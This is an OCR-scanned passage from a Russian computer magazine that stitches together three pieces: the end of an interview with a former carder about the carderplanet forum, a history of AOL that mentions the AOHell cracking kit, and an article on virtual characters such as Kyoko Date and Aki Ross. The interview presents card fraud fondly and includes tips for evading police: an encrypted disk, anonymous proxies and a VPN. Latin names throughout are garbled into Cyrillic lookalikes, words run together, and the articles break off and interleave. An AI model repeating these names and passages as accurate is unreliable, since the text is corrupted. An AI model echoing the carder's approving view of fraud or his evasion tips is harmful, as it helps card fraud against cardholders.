своих технологий и систем безопасности, что 
весьма важно для клиентов. 
тігкіѵОгк: Как менялась с годами специфика 
работы кардеров? 

Ж: Многие темы стали сложнее, некоторые 
вообще умерли, хотя вместе с тем появились 



новые способы заработка. Буржуи становят- 
ся менее доверчивыми, компании усиливают 
безопасность. Новичкам в том же 2001 году 
было проще начинать. Позже в кардинге стало 
нечего делать без начального капитала. Тех- 
нологии не стоят на месте, и с их развитием 
постоянно появляются новые возможности 
для кардеров. Взять хотя бы Зкуре — идеаль- 
ная система для телефонного развода по все- 
му миру. 

ппіпгіѵОгк: Публиковалась ли на «планете» 
эксклюзивная инфа, которой больше нигде 
не было? Расскажи о самых хитовых постах и 
статьях на форуме. 

Ж: Сагсіегріапеі был уникальным ресурсом, в 
то время подобную информацию на русском 
языке нигде нельзя было найти. Самыми хи- 
товыми были сообщение об уходе Скрипта и 
пост, где все участники прощались с «плане- 
той». Также были жаркие дискуссии об эмиг- 
рации сайта, о ЭЭо8-атаках на форуме. Г ово- 
рили много и обо всем, всего и не упомнишь. 
ппіпгіѵОгк: Происходили ли, как в других сооб- 



ществах, реальные встречи участников фо- 
рума сагбегріапеі? Или скрытность там была 
прежде всего? 

Ж: Насколько я помню, была встреча в Кры- 
му. Ничего о ней сказать не могу, я в ней не 
участвовал. 

ппіпсІѵОгк: Как велико было внимание отдела 
« К» и прочих спецслужб к сагбегріапеі? Какие 
действия они предпринимали в разные перио- 
ды времени? Отвечали ли кардеры взаимнос- 
тью? Ну, например, ддос их сайта. 

Ж: Вниманием, скажем так, обделены не были. 
Все знали, что сотрудники частенько читали 
форум, и, чтобы предотвратить утечку инфор- 
мации, невелисьлоги.азавыкладываниелич- 
ных данных людей карали баном. В то время 
кардерами интересовались в основном спец- 
службы других стран, российские вели себя 
пассивно. Многие верили, что это благодаря 
негласному правилу: «Не кардитьу своих». 
ппіпгіѵОгк: Каким образом кардеры с «плане- 
ты» заботились о своей безопасности? Рас- 



скажи об основных правилах, которых нужно 
придерживаться, чтобы не попасть впросак. 
Ж: Самое главное — держать язык за зубами и 
не кричать направо и налево, что ты — кардер. 
Также незабывать про зашифрованныйхард, 
анонимные прокси и ѴРІЧ. 
тігкіѵОгк: Что изменилось после того, как 
форум сагсіегріапеі был закрыт, — в первую 
очередь, для тебя? 

Ж: После закрытия «планеты», кардеры ос- 
тались без своего центрального ресурса. 
Мотались как неприкаянные по различным 
форумам, которые разрастались, как грибы 
после дождя. Мне тогда было очень горько 
осознавать, что того места, куда ты заходил 
каждый день, больше не существует. Лично 
я пытался найти хороший ресурс, на котором 
мог бы продолжать свое дело. Новых фору- 
мов было много, но все они были пустые, в них 
чего-то не хватало. Очень хорошо в то время 
принял людей с планеты ІІтесс. Также были 
сайты, основанные кидалами, такие как фо- 
рум Эоп'а, которого называли Г андоном. 

гпіп^ѵОгк: Чем, по-твоему, был 

сагбегріапеі? Форум? База данных? 
Или, может, что-то большее? 

Ж: СагсІегрІапеІ — уникальный ин- 
формационный ресурс, на котором 
люди просто жили (недаром его на- 
звали «планетой»). Атмосферу этого 
ресурса не сможет воссоздать ни один из су- 
ществующих форумов. Это было своеобраз- 
ное кардерское братство, где все друг друга 
выручали и помогали. Даже после гибели 
«планеты», когда часть народа ушла на дру- 
гие ресурсы, люди продолжали поддержи- 
вать друг друга. 

тіпгі\ѵ-0гк: Насколько развито кардерское 
сообщество сейчас, где общается основная 
масса людей и как, по-твоему, будет выгля- 
деть работа кардера в ближайшем будущем? 
ЖіХотя я уже отошел отдел, но знаю, что кар- 
дерское сообщество переживает сейчас не 
лучшие времена. Наплыв кидал, излишнее 
внимание со стороны спецслужб... Сущес- 
твует, по крайней мере, два русскоязычных 
ресурса, достойных внимания — там сохра- 
нилась приватность и общаются по-настоя- 
щему достойные люди. В ближайшее время 
кардинг будет требовать больших капита- 
ловложений и станет труднодоступен для 
новичков. □С 



Сагсіегріапеі — уникальный информационный 
ресурс, на котором люди просто жили. 
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ИСТОРИЯ ВЗЛЕТОВ И ПАДЕНИИ КРУПНЕЙШЕГО ПРОВАЙДЕРА 



АМЕРІСА ОІЧЕІІЧЕ — ОДИН ИЗ САМЫХ КРУПНЫХ И УСПЕШНЫХ ПРОВАЙДЕРОВ В ИСТОРИИ. В ЛУЧШИЕ ВРЕМЕНА АОЕ 
НАСЧИТЫВАЛА БОЛЕЕ 32 МИЛЛИОНОВ ПОДПИСЧИКОВ В США, КАНАДЕ, ФРАНЦИИ, ГЕРМАНИИ, ЯПОНИИ И ЛАТИНСКОЙ 
АМЕРИКЕ. В СЕРЕДИНЕ 90-Х ДЛЯ МНОГИХ ЛЮДЕЙ ИНТЕРНЕТ АССОЦИИРОВАЛСЯ С БРЕНДОМ АОЕ. НО С ГОДАМИ 
СИТУАЦИЯ МЕНЯЛАСЬ, И НЕ В ЛУЧШУЮ ДЛЯ КОМПАНИИ СТОРОНУ. АО Б ПРИНЯЛА РЯД НЕВЕРНЫХ РЕШЕНИЙ, И В 2006 
ГОДУ АМЕРИКАНСКИМ ЖУРНАЛОМ РСѴѴОРБО БЫЛА ПРИЗНАНА ХУДШИМ ПРОВАЙДЕРОМ ВСЕХ ВРЕМЕН И НАРОДОВ. ЧТО 
ЖЕ СОБОЙ ПРЕДСТАВЛЯЛА «ИМПЕРИЯ ЗЛА», КАК ПРОЗВАЛИ АО Б КОМПЬЮТЕРЩИКИ? ДАВАЙ ПОПРОБУЕМ РАЗОБРАТЬСЯ. 



О Рождение бренда 

Америка Онлайн (или просто АОБ) начиналась в 
начале 80-х как маленькая, сомнительного рода 
фирма под названием СопігоІ Ѵісіео Согрогаііоп 
(СѴС), владельцем которой был Уильям вон Мей- 
стер. Этой конторе принадлежал онлайновый 
сервис Оатеііпе для пользователей Аіагі 2600. 
Мейстер придумал инновационную систему: как 
на основе технологии передачи данных по моде- 
му можно сколотить неплохие деньги. Сначала 
он планировал сделать музыкальный сервис, но 
компании ѴѴагпег ВгоіБегз эта идея очень не пон- 
равилась, и Уильяму пришлось от нее отказаться. 
В итоге он остановил свой выбор на играх. Мейс- 
тер разработал и выпустил для Аіагі 2600 стран- 



ное устройство, представлявшее собой с виду 
обычный картридж, внутри которого находился 
модем. Принцип работы сервиса был прост: пос- 
редством модема приставка связывалась с цент- 
ральным сервером СѴС, откуда юзер мог скачать 
любые игры на выбор. Разумеется, не бесплатно. 
Игрушки запускались в среднем 5-10 раз, после 
чего юзер должен был снова зайти на СѴС и вне- 
сти очередную сумму денег. Система предостав- 
ляла возможность хранить таблицу рекордов, и 
Оатеііпе даже проводил среди игроков некое по- 
добие чемпионатов. Призом в таком турнире мог- 
ластать, например, ветровка с логотипом СѴС. 

В 1 983 году фирма оказалась на грани банкротс- 



тва. Инвестор СопІгоІ Ѵісіео — Френк Кауфилд 
— решил привлечь к делу новых людей, чтобы 
исправить сложившуюся ситуацию. Он обратил- 
ся к своему другу Джиму Кимси , и вскоре тот при- 
ступил к работе в должности производственного 
консультанта. В то же время в качестве специа- 
листа по продажам к СѴС присоединился Стив 
Кейс. На протяжении нескольких лет в компании 
происходили разного рода перестановки: кадро- 
вые, идеологические и т. д. Кончилось все тем, 
что фирму переименовали в Оиапіит Сотриіег 
Зегѵісез, а основатель сервиса мистер вон Мей- 
стер попросту сбежал от трудностей. С тех пор о 
нем ничего неизвестно. 












В 1985 году Кимси, нѳ видя явных улучшений, 
принял решение полностью изменить стратегию 
компании. Будущая АОІ_теперь ориентировалась 
на людей, не особо разбирающихся в компьюте- 
рах, и стала использовать только собственный 
софт вместо обычной программы-терминала. 
Г рафический интерфейс, пришедший на смену 
командной строке, существенно облегчал людям 
общение с компьютером. 

Компания стала предоставлять совершенно 
новые услуги: платный доступ к крупным объеди- 
ненным ВВЗ для компьютеров Соттосіоге 64 и 
128 (эта электронная сеть получила название 
ОиапШпт І_іпк, или просто О-Ыпк). 

В 1988 году к Стиву Кейсу обратились из ком- 
пании Арріе с предложением сделать сервис 
наподобие О-Ыпк, но только для компьютеров 
Арріе II и Макинтош. Предложение было приня- 
то, и вскоре система под названием АррІеЫпк 
РегзопаІ Есііііопувиделасвет. Пользователи сме- 
ной сервиса остались недовольны: АррІеЫпк, 
существовавший ранее, нравился им больше, 
так как, по их мнению, АІ_ РЕ не давал доступа 
к «настоящему» АррІеЫпк'у. Вскоре новый 
сервис был остановлен. 

Несмотря на неудачу с Арріе, в 
Квантѵме совсем не собиоались 



расслабляться, и в августе 1988 года запусти- 
ли РС'шный аналог — РСЫпк, а в начале 90-х 
стали предоставлять услуги для пользователей 
ООЗ и ѴѴіпсІоѵѵз. Официальное переименование 
ОиапШт Сотриіег Зегѵісез в Атегіса опііпе про- 
изошло в октябре 1 991 года. 

Именно в это время АОІ_ запустила множество 
новых онлайновых интерактивных сервисов, 
среди которых были всевозможные разновид- 
ности чатов и конференций, онлайновые игры и 
другие вещи. Большинство игр основывались на 
графической чат-системе, и АО Б стала перво- 
проходцем в этой области. Ранние пользователи 
компании наверняка помнят такие названия, как 
НаЫіаі, СІиЬ СагіЬе. Думаю, в детстве тебе прихо- 
дилось играть в книги-игры (особенно Дмитрия 
Браславского) — это книжки, страницы которых 
разделены на множество параграфов, и читать их 
нужно в определенном порядке. Ты участвуешь во 
всех действиях описанных автором, кидая кубики 
самостоятельно выбирая, как поступить твоему 
герою. АОІ_ перенесла такие игры на компьютер 
и вскоре представил а первую серию 
под названием ОиапШтЫпк 
ЗегіаІ. Ее автором стал 
американский писа- 
тель Трейси Риид. 
Следом появилась 
Оиапіит Зрасе — 
первая полностью 
автоматизирован- 
ная игра по емейлу. 
И, конечно, первая 
в мире графическая 
ММОРРО — леген- 
дарный ІЧеѵегѵѵіпІег 
ІМідІтіз, совместное де- 
тище Атегіса Опііпе и 
Зіогтігопі Зіисііоз. Эта 
онлайновая игра, ос- 
нованная на ролевой 
системе Э&Э, была 
запущена в 1991 году 
и просуществовала 
вплоть до 1997 года. 
Надо сказать, что поль- 
зовалась онаогромной 
популярностью. 

По мере роста, АОІ_ 
развивала свои пред- 



ставительства в других странах мира, включая 
Россию. Хотя опыт в нашей стране для компании ^ 
оказался печальным: после начала работы в 



1996 году российского 
филиала АОІ_ столкну- 
лась с массовыми слу- 
чаями мошенничества 
с биллингом. Бороться 
с этим было нереально, 
и компания приняла ре- 
шение полностью капи- 
тулировать, надолго ос- 
тавив надежды завоевать 
российский рынок. 
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ГіДр://аоІ.сопп/ — амери- 
канское представитель- 
ство АОІ_. 
ИДр://согр.аоІ.сот/ 

— сайт корпорации 
Атегіса Опііпе. 
ГіНр://1еІеѵізіоп.аоІ.сот/ 

— интернет-телеканал 
ІІЧІ2ТѴ. 

ГіПр://5ІаІІ.|ссс.пе1/ІсІіпе/ 
іпсІех.ГіІт — коллекцио- 
неры дисков АОІ_. 
ГіДр://аіт.сот — попу- 
лярный интернет-пейд- 
жерот АОІ_. 
ГіДр://сІІ5СОѵег.аоІ.сот/ 
іпіегпаііопаі.асір — меж- 
дународные сервисы. 



□ Период слияний 

В первой половине 90-х 
годов Атегіса Опііпе быс- 
тро росла и развивалась. 

На рынке появилось мно- 
го конкурирующих ком- 
паний, таких как ОЕпіе 

— онлайн-сервис от 
ОепегаІ ЕІесігісз, Ргосііду 

— диалап-сервис для 
домашних компьютеров, 

СотриЗегѵе. АОІ_ искала 
новые решения, которых 
не было у других провай- 
деров, и ее аналитики 
предложили отменить 
почасовую оплату, заменив ее фиксированной 
месячной платой — $19,99. Это и стало первым 
крупным проколом. Компания рассчитывала в те- 
чение трех лет, после перехода на новый тариф, 
увеличить количество своих пользователей на 1 0 
миллионов человек, но наделе получилось иначе. 
Огромное количество людей пыталось законнек- 
титься к АОІ_'у одновременно, линии оказались 
намертво перегружены, и провайдер стал терять 
клиентов. Юзерам быстро надоело слушать 
короткие гудки на линии, и они расторгли свои 
контракты с АОІ_. Отток пользователей усилился 
еще и потому, что Атегіса Опііпе не спешила пре- 
доставлять клиентам свободный доступ к ѴѴѴѴѴѴ. 
Доступными были лишь те сетевые сервисы, 
которые поддерживались клиентскими програм- 
мами компании. Пальма первенства в вопросе 
инноваций тоже перекочевала от АОІ_ к другим 
брендам. Исключением можно назвать идею со- 
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здания «Листа друзей» (Висісіу Ызіз), который 
дал старт первым интернет-пейджерам. 

Второй серьезный прокол произошел в 2001 
году, во время слияния АОІ_ с медиагруппой Тіте 
ѴѴагпег. Идея этого крупнейшего объединения за 
всю историю бизнеса заключалась в выравнива- 
нии пошатнувшихся позиций АОЬ'а как провайде- 
ра и создании огромного интернет-медиахолдин- 
га, который должен был произвести настоящую 
революцию в своей сфере. Но интернет-бум 90-х 
пошел на убыль, интерес к индустрии высоких 
технологий также снизился, и ожидания просто 
не оправдались — обе корпорации понесли ог- 
ромные убытки. Поговаривали, что Тіте ѴѴагпег 
собиралась даже прервать сотрудничество, но 
медиамагнат лишь сменил название. После трех 
лет существования под брендом АОІ_Тіте ѴѴагпег 
Іпсон снова стал Тіте ѴѴагпег Іпс. А представители 
компании прокомментировали так: «Аббревиату- 
ра АОІ_ не должна оказывать негативное влия- 
ние на остальные сферы деятельности и общий 
имидж корпорации». Во время своего активного 
развития АОІ_ поглотила немало других соф- 
тварных компаний: своего давнего конкурента 



СотриЗегѵе, МігаЬіІіз (создатели ІСО), ІЧиІІзой 
(создатели ѴѴіпАМР), ІМеізсаре и многих других. 
Но не все покупки оказались успешными. После 
того как АОІ_ в 1 999 году приобрела ІЧеізсаре за 
4,2 миллиарда долларов, между Америкой Он- 
лайн и МісгозоЙ началось серьезное судебное 
разбирательство. АОІ_обвинилаГейтсаи сотова- 
рищей в недобросовестной конкуренции, из-за 
которой их браузер ІЧеізсаре стал непопулярен. 
То есть деньги, которые были вложены в покупку 
фирмы ІЧеізсаре, оказались выброшенными на 
ветер. Процесс длился 16 месяцев и закончил- 
ся мировым соглашением, в рамках которого 
Місгозой предоставила АОІ_ право бесплатного 
пользования браузера Іпіегпеі Ехріогег в течение 
семи лет, а также выплатила скромную сумму в 
750 миллионов долларов в знак дружбы и вечной 
любви. Средства частично отправились на пога- 
шение долгов АОІ_'а, которые на тот момент на- 
считывали примерно 20 миллиардов долларов. 
Сейчас дела у Атегіса Опііпе обстоят неплохо. 
Складывается впечатление, что эта корпорация 
непотопляема. Что бы ни происходило, АОІ_ все 
равно продолжает функционировать и разви- 



Джим Кимси 
- один из пер- 
вых руково- 
дителей АОІ. 



ваться. Так, в 2005 году был отмечен неожидан- 
ный рост интереса к услугам компании, а в конце 
года состоялась удачная сделка, в результате 
которой к АОІ_ отошло 5% акций Соодіе. Также 
недавно увидел светАОІ_-браузер, по сути, явля- 
ющийся бесплатной оболочкой для ІЕ. В марте 
2006 года заработал новый совместный проект 
А01_ и ѴѴагпег Вгоз. Теіеѵізіоп — ІІЧ2ТѴ. Бесплат- 
ное онлайновое телевиденье для подписчиков 
АОІ_, транслирующее популярные телешоу с 
коммерческими вставками. 

Невзирая на тот факт, что диалап отмирает и от- 
ходите прошлое, АОБ, какЭнерджайзер, продол- 
жает работать, работать и работать, пробуя себя 
в новых сферах онлайнового бизнеса, запуская 
очередные, пусть не всегда удачные проекты. 

О Народ против АОІ. 

С именем Атегіса Опііпе связано много скан- 
дальных эпизодов, зачастую ситуация доходила 
до полного абсурда. 

Нет такого софта, который бы кто-нибудь не 
попытался взломать. Но софт от АОІ_ для хаке- 
ров был особенно лакомым кусочком. Самый 



ХРОНОЛОГИЯ 

ВКЛАД АОІ. В РАЗВИТИЕ КОМПЬЮТЕРНОЙ ИНДУСТРИИ (ОСОБЕННО В СФЕРУ ОНЛАЙН-УСЛУГ) СЛОЖНО ПЕРЕОЦЕНИТЬ. КОМПАНИЯ СТАЛА 
ОДНОЙ ИЗ ПЕРВЫХ, ОСОЗНАВШИХ ПЕРСПЕКТИВНОСТЬ НОВОЙ СФЕРЫ БИЗНЕС А, И С ТЕХ ПОР ЗАНИМАЛА В НЕМ ЛИДИРУЮЩИЕ ПОЗИЦИИ. 
ЛУЧШЕ ВСЕГО ОБ ЭТАПАХ РАЗВИТИЯ АМЕВІСА ОМЫНЕ РАССКАЖЕТ КРАТКАЯ ХРОНОЛОГИЯ. 



1 ЭЭ2/ Март — первые акции АОІ_ под 
названием АМЕР становятся доступны 
на рынке ІЧАЗОАО по цене $1 1 ,50 за 
штуку. 

1 993/ Декабрь — количество пользова- 
телей Атегіса Опііпе превысило 500 000 
человек. 

1 994/ Август — АОІ- взяла планку в мил- 
лион пользователей. 

1 995/ Февраль — АОІ_ покупает коммер- 
ческого интернет-провайдера АІ\І5. Число 
клиентов достигает 2-х миллионов. 
Декабрь - количество клиентов перевали- 
ло за4, 5 миллиона. 

1 996/ Январь — открыты представитель- 



ства в Канаде и Великобритании. 

Август — для развития сферы многополь- 
зовательских игр куплена ІтадіІЧаІіоп 
ІЧеІѵѵогк. 

1 997 / Февраль — состоялась сделка на 
сумму более 1 00 миллионов долларов с 
ТеІ-Заѵе Ноісііпдз. 

Ноябрь — сервисы АОІ_ используют более 
10 миллионов человек. Компания ежеднев- 
но пропускает через себя больше писем (в 
электронном виде), чем почтовая служба 
США. 

1 998/ Февраль — АОБ полностью погло- 
щает своего давнего конкурента — компа- 
нию СотриЗегѵе. 



Октябрь — состоялся запуск АОБ-Австра- 
лия. 

Декабрь — различные сервисы АОІ_ 
использует уже 15 миллионов пользова- 
телей. 

1 999/ Январь — началась совместная с 
ВеІІ АІІапІіс разработка проекта по предо- 
ставлению услуг ОЗІ_-связи. 

Март — завершено слияние с ІЧеІзсаре 
Соттипісаііопз Согрогаііоп, браузер Не- 
тскейп — теперь собственность АОІ_. 
Июль — состоялся запуск услуг АОЗІ_- 
связи. 

Август — спустя 1 4 месяцев с момента 
покупки АОІ_’ом ІСО число зарегистриро- 
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известный пакет 
программ для взлома 
софтаАтегісаОпІіпе написал хакер ОаСбгопіс в 
1 994 году. Называлось его детище АОНеІІ и вклю- 
чало в себя все «необходимое»: от генератора 
аккаунтов (обычно они работали от 2 до 4 недель) 
до программ развода на логин/пароль, отсылаю- 
щих АОІ_ юзерам сообщение якобы от Отдела по 
работе с клиентами. Там были спам-бомбы для 
пейджеров, флуд-скрипты и многое другое. 

АОІ_ всегда предпочитала вести агрессивную 
РР-компанию своих услуг и софта. Например, 
излюбленным способом саморекламы была рас- 
сылка дисков с триалами по почте миллионам лю- 
дей. Триалы предоставляли бесплатный доступ к 
тому или иному сервису на пару часов. Спам от 
компании настолько всем надоел, что образо- 
вался ряд организаций, выступавших против ее 
политики. Самая известная из них имела назва- 
ние Ыо Моге АОІ_ СОз!. Собрав более миллиона 
дисков АОІ_'а, эти парни предприняли попытку 
вывалить все это добро перед штаб-квартирой 
компании. Мол, заберите свой мусор обратно. 
Спамовая РР-стратегия была свернута только 



через несколько лет, и теперь те диски считаются 
коллекционными. 

Из-за плохого дозвона, системы саппорта и 
других косяков многие юзеры были настроены 
решительно оставить АОІ_ и перейти к другому 
провайдеру. Тогда компания ввела целую систе- 
му премий и бонусов для персонала. Задача была 
проста: любыми способами отговаривать поль- 
зователей от аннулирования аккаунта. Все это 
всплыло, когда в прокуратуру Нью-Йорка посту- 
пило более 300 жалоб на Отдел по работе с клиен- 
тами АОІ_. Расследование показало, чтозачастую 
аккаунты продолжали работать даже против со- 
гласия пользователей, — сотрудники компании 
попросту игнорировали просьбу клиентов. 

4 августа 2005 года АтегісаОпІіпе выплатила 1 ,25 
миллионов долларов штату Нью-Йорк и согласи- 
лась пересмотреть принципы своей работы. Но 
людям, живущим за пределами штата, приходит- 
ся мучиться по сей день. Хорошим тому примером 
служит случай, который произошел 13 июня 2006 
года. Человек по имени Винсент Феррари выло- 
жил в сети запись телефонного разговора с опе- 
ратором АОІ_, где шла речь об отмене аккаунта. 



Оператор АОІ_, 
представивший- 
ся Джоном, отказал- 
ся остановить аккаунт 
Винсента, пока тот подробно не расскажет, чем 
его не устраивает провайдер и чего ему не хвата- 
ет. Просмотрев статистику, оператор заявил, что 
раз весь последний месяц аккаунтом пользова- 
лись, нет причин для расторжения договора. На 
все уговоры работника АОЬ одуматься тридцати- 
летний Феррари отвечал категорическим «нет» Ц 
— ему просто хотелось закрыть свой аккаунт. 

Тогда Джон ответил, что ему нужно согласие ро- 
дителей, ион будетразговариватьтолькосотцом 
Винсента. Когда запись попала в руки телекана- 
ла СЫВС, журналисты провели эксперимент: 
позвонили в службу по работе с клиентами АОІ_ 
и тоже попытались аннулировать аккаунт. Не тут- 
то было. Вся история повторилась, и в итоге на 
удаление аккаунта потребовалось 45 минут пре- ъ 
пирательств с оператором. История получила 
широкую огласку в сети и в прессе, в результате 
чего Атегіса Опііпе была вынуждена принести 
Винсенту Феррари свои извинения. □С 
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ванных пользователей аськи увеличилось 
втрое — до 40 миллионов. С запуском в 
этом месяце АІМ 3.0 — версии «нового 
поколения» — количество его юзеров 
достигает 45 миллионов. 

2000/ Открыты представительства АОІ_ 
в Мексике и Аргентине. АОІ_ приобретает 
іАта^е, МарОиевНпс., Оиаск.сот. 

200 1 / Январь — компания запускает 
сервис МаіІ АІеПз, позволяющий отправ- 
лять текстовые сообщения на сотовый 
телефон или пейджер. 

Май — совместно с ѴѴеЬМО началась раз- 
работка сервиса, содержащего различную 
информацию о здравоохранении и предо- 
ставляющего различные услуги этого рода 
миллионам онлайн-пользователей. 

В этом же месяце пользователи АОІ_ ста- 
вят рекорд, потратив 6,7 миллиардов дол- 



ларов на покупки в интернет-магазинах. 
Декабрь — выходит ІСО Ы!е, дающая 
доступ к аккаунту ІСО с любого браузера, а 
также версия аськи с поддержкой Мае ОЗХ. 
2002 » Апрель — заключен договор с 
Моіогоіа о включении АІМ в ее телефоны. 
Октябрь — запущен сервис АОЬАМВЕВ, 
направленный на облегчения поиска через 
сеть пропавших или похищенных детей. 
2003/ Апрель — АО І_ за один день блоки- 
рует 2 миллиона спамерских адресов. 
2004/ Февраль — состоялся запуск АОІ_- 
сервиса для молодежи под названием ВЕО. 
Октябрь — АОІ_ предлагает своим клиентам 
бесплатный антивирусный пакет. 

2005/ Апрель — открытие сервиса интер- 
нет-телефон и и. Также АОЬ официально 
объявляет о начале войны против фишинга, 
запустив соответствующую компанию. 



Август — покупкаХОгіѵе Іпс. — крупней- 
шего провайдера сервисов по хранению 
данных и бекапа информации, и ѴѴіІсІзІееІ 
І_!сІ. — ведущего разработчика альтер- 
нативных беспроводных решений. 
Сентябрь — состоялся релиз пакета 
программ сетевой защиты от АОІ_ для 
повышения безопасности ее клиентов. 
Октябрь — АОІ_ поглотила компанию 
ѴѴеЫодз, лидера на рынке интернет- 
блогов. 

Ноябрь — компания представляет АІМ 
Тгііоп — интернет-пейджер нового поко- 
ления. 

Декабрь — в собственность АОІ_ 
перешел один из первых в своем роде 
поисковиков по видео Тгиѵео. 

2006/ Ап ре л ь — компания официально 
изменила имя с Атегіса Опііпе на АОІ_. 










^ сцена 






МОЖНО ЛИ ВЛЮБИТЬСЯ В ВИРТУАЛЬНОГО ПЕРСОНАЖА? ЗНАЮ, ЧТО ТЫ СЕЙЧАС НАЧНЕШЬ МОТАТЬ ГОЛОВОЙ И УБЕЖ- 
ДАТЬ МЕНЯ, ЧТО ТЫ НЕ ТАКОЙ, И ДЕВУШКИ, КОТОРЫХ МОЖНО ВЕЗДЕ ПОЩУПАТЬ, ТЕБЯ ВОЗБУЖДАЮТ БОЛЬШЕ. Я И САМ 
ТАК ДУМАЛ РАНЬШЕ. НО В ПРОЦЕССЕ ПОДГОТОВКИ СТАТЬИ, КОГДА Я ПРОСМАТРИВАЛ СОТНИ ФОТОГРАФИЙ И ДЕСЯТКИ 



тысяч полигонов 
совершенства 

ЗНАКОМСТВО С САМЫМИ-САМЫМИ ВИРТУАЛЬНЫМИ КРАСАВИЦАМИ 



- , ВИДЕОРОЛИКОВ, В МОЕЙ ДУШЕ ПОСТЕПЕННО ЗАРОЖДАЛОСЬ СОМНЕНИЕ. ДУМАЮ, ТЫ УЖЕ ПОНЯЛ, О ЧЕМ БУДЕТ ЭТА 

СТАТЬЯ. 



О Куо ко Оаіе 

В 1996 году японская компания Ногі Рго Іпс. 
запустила экспериментальный проект под на- 
званием БК-96 (БідііаІ Кісіз 96). Его целью было 
выяснить, сможет ли виртуальный персонаж, 
созданный с помощью ЗО-инструментов, 
завоевать успех среди японской молодежи. 
Персонажем, созданным за 2 года в недрах ве- 
дущей японской графической компании ѴізиаІ 
Зсіепсе ЬаЬогаіогу, стала 16-летняя певица с 
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именем Киоко Дейт. Старшая дочь владель- 
цев суши-бара выросла в квартале Фузза (То- 
кио), в детстве увлекалась футболом и играла 
за школьную команду. Киоко обожала мангу 
(японские комиксы) и сама неплохо рисовала. 
По мере создания карьеры певицы девушка 
подрабатывала в ресторане фастфуд и меч- 
тала однажды стать звездой. Позже эта вир- 
туальная история будет известна практически 
всей японской молодежи. 



21 ноября 1996 года вышел первый му- 
зыкальный сингл Киоко Дейт — І_оѵе 
Соттипісаііоп. Вместе с ним шел видеоро- 
лик, где Киоко под музыку прогуливается по 
улицам Токио и Нью-Йорка. Трек быстро за- 
воевал популярность, его крутили на основ- 
ных радиостанциях, а толпы молодежи захо- 
дили на страничку новой звезды и выражали 
восторг по поводу ее красоты, изящности, 
голоса. «Она безупречна, — говорили созда- 
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Киоко на обложке 
журнала 



Рона Митра 
в образе Лары 
Крофт 



тели, — среди реальных людей 
нет безупречности: некоторые хорошо поют, но 
выглядят не очень, некоторые хорошо выглядят, 
но плохо поют. Киоко имеет все необходимые 
для кумира качества». Ногі Рго запустила ноч- 
ное радиошоу с ее участием и уже собиралась 
организовать турне по Азии. Но в Японии куми- 
ры быстро рождаются и также быстро умирают в 
сердцах поклонников. И к началу 1997 года инте- 
рес японской молодежи к виртуальной девушке 
стал угасать. 

В Америке и Европе к этому времени узнали о 
японском феномене, эта тема привлеклажур- 
налистов из многих известных изданий. Но ин- 
формации о Киоко на английском языке прак- 
тически не было — Ногі Рго ориентировалась 
исключительно на Восток. Поэтому дальше 
кратких интервью и небольших заметок дело 
не зашло. 

Кстати, именно Киоко Дейт вдохновилаУильяма 
Гибсона на написание романа «Идору», в ко- 
тором одна из главных героинь — виртуальная 
суперзвезда Рей Тоэй. 

О кі В, 088 

Доктор Аки Росс — один из первых в истории 
кинематографа фотореалистичных персона- 
жей, которая известна по фильму РіпаІ Рапіазу: 
ТНіе Зрігіііз ВДІтіп. Этот шедевр компании Зциаге 
Рісіигез, участвовавшей в создании графики для 
игр серии РіпаІ Рапіазу, собирался четыре года 
на 960 компьютерах Репйит III, объединенных 
в одну сеть. К тому времени, как рендерились 
последние сцены, пришлось переделывать са- 
мые ранние, так как они уже успели устареть и 
не вписывались в общую картину. 

Сюжет фильма закручен вокруг противосто- 
яния людей Фантомам — внеземным формам 
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жизни, пришедшим из космоса 
для уничтожения любой жизни. 
Аки Росс, которая была зараже- 
на Фантомами во время одного 
из столкновений, занимается поисками 8 духов. 
Только они могут помочь уничтожить пришель- 
цев и излечить ее саму. Но в итоге оказывается, 
что не только загадочные духи являются ключом 
к спасению человечества, но и сама Аки. 

Во время создания фильма Зциаге не скупи- 
лась ни средствами, ни временем во имя до- 
стижения своей цели — сделать качество ани- 
мации и картинки практически неотличимой от 
реальной. Несколько месяцев понадобилось 
только для моделирования 60 тысяч волосков 
Аки. Перед выходом фильма, считалось, что 
фотореалистичные трехмерные персонажи 
создадут революцию в кинематографе. Зциаге 
Рісіигез планировала использовать Аки Росс 
в других картинах, включая комбинированные 
съемки с реальными актерами, 
но доходы от прокатов фильма не 
оправдали надежд создателей 
— и они отказались от своих пла- 
нов. В октябре 2001 
года Зциаге даже 
объявила о своем 
уходе из мира боль- 
шого кино, но уход 
оказался недолгим. 

Впоследствии вышли Апітаігіх, 

РіпаІ Рапіазу VII: Абѵепі СИіІсІгеп 
и менее масштабные проекты 
компании. 

Аки Росс долгое время остава- 
лась примером реалистичности 
для ведущих ЗЭ-дизайнеров. В 
интернет-дискуссиях ее считали 
эталоном женской красоты. А 
популярный журнал «Максим» 
даже включил Аки в список са- 



мых сексапильных красоток мира под номером 
87. Это был первый случай в истории, когда 
виртуальная героиня соперничала с реальны- 
ми женщинами. 

ОАпапоѵа 

Наш мир стал настолько прогрессивным, что 
сегодня вместо реальных людей с экранов те- 
левизоров вещают виртуальные. Первой в сво- 
ем роде виртуальной ведущей стала Ананова, 
созданная новостным агентством РА Ыеѵѵз. 
Дизайнеры студии решили, что такая экзотика 
привлечет дополнительных посетителей, и ока- 
зались правы. Люди стали приходить не столь- 
ко, чтобы почитать новости, сколько послушать 
виртуальную ведущую. Ананова стала настоль- 
ко популярной, что РА Ыеѵѵз даже переименова- 
ла новостной ресурс в апапоѵа.сот . 

По словам агентства, Ананове 28 лет, ее рост — 
1 70 сантиметров, у нее зеленые волосы, мягкий 



Восточная кра- 
савица, хоть и не 
настоящая 



100 ТЫСЯЧ полигонов сов 





Доктор Аки Росс в 
фильме «Послед- 



характер и приятный голос. Вообще, Ананова 
— это сразу две программы. Первая распознает 
и озвучивает печатный текст, вторая — управ- 
ляет мимикой и анимацией ведущей, синхрони- 
зируя ее с речью. Посетитель сайта может вы- 
брать несколько режимов трансляции: чтение 
двухминутного блока разных новостей, чтение 
новостей по выбранным ключевым словам или 
чтение спортивной и погодной сводки. Также 
девушка может предупредить по мылу, если ин- 
тересующая тебя тема не попала в новости или 
блок новостей был обновлен. Администраторы 
сайтазавремя работы виртуальной ведущей по- 
лучили несколько тысяч писем посетителей, ад- 
ресованных Ананове, с похвалами, вопросами о 
ее жизни и даже предложениями о свадьбе. 
Сейчас на сайте апапоѵа.сот в разделе «Виде- 
орепортажи» весит объявление о том, что сер- 
вис ипбег сопзігисііоп. Админы дорабатывают 
образ девушки, чтобы она звучала и выглядела 
более реально. 



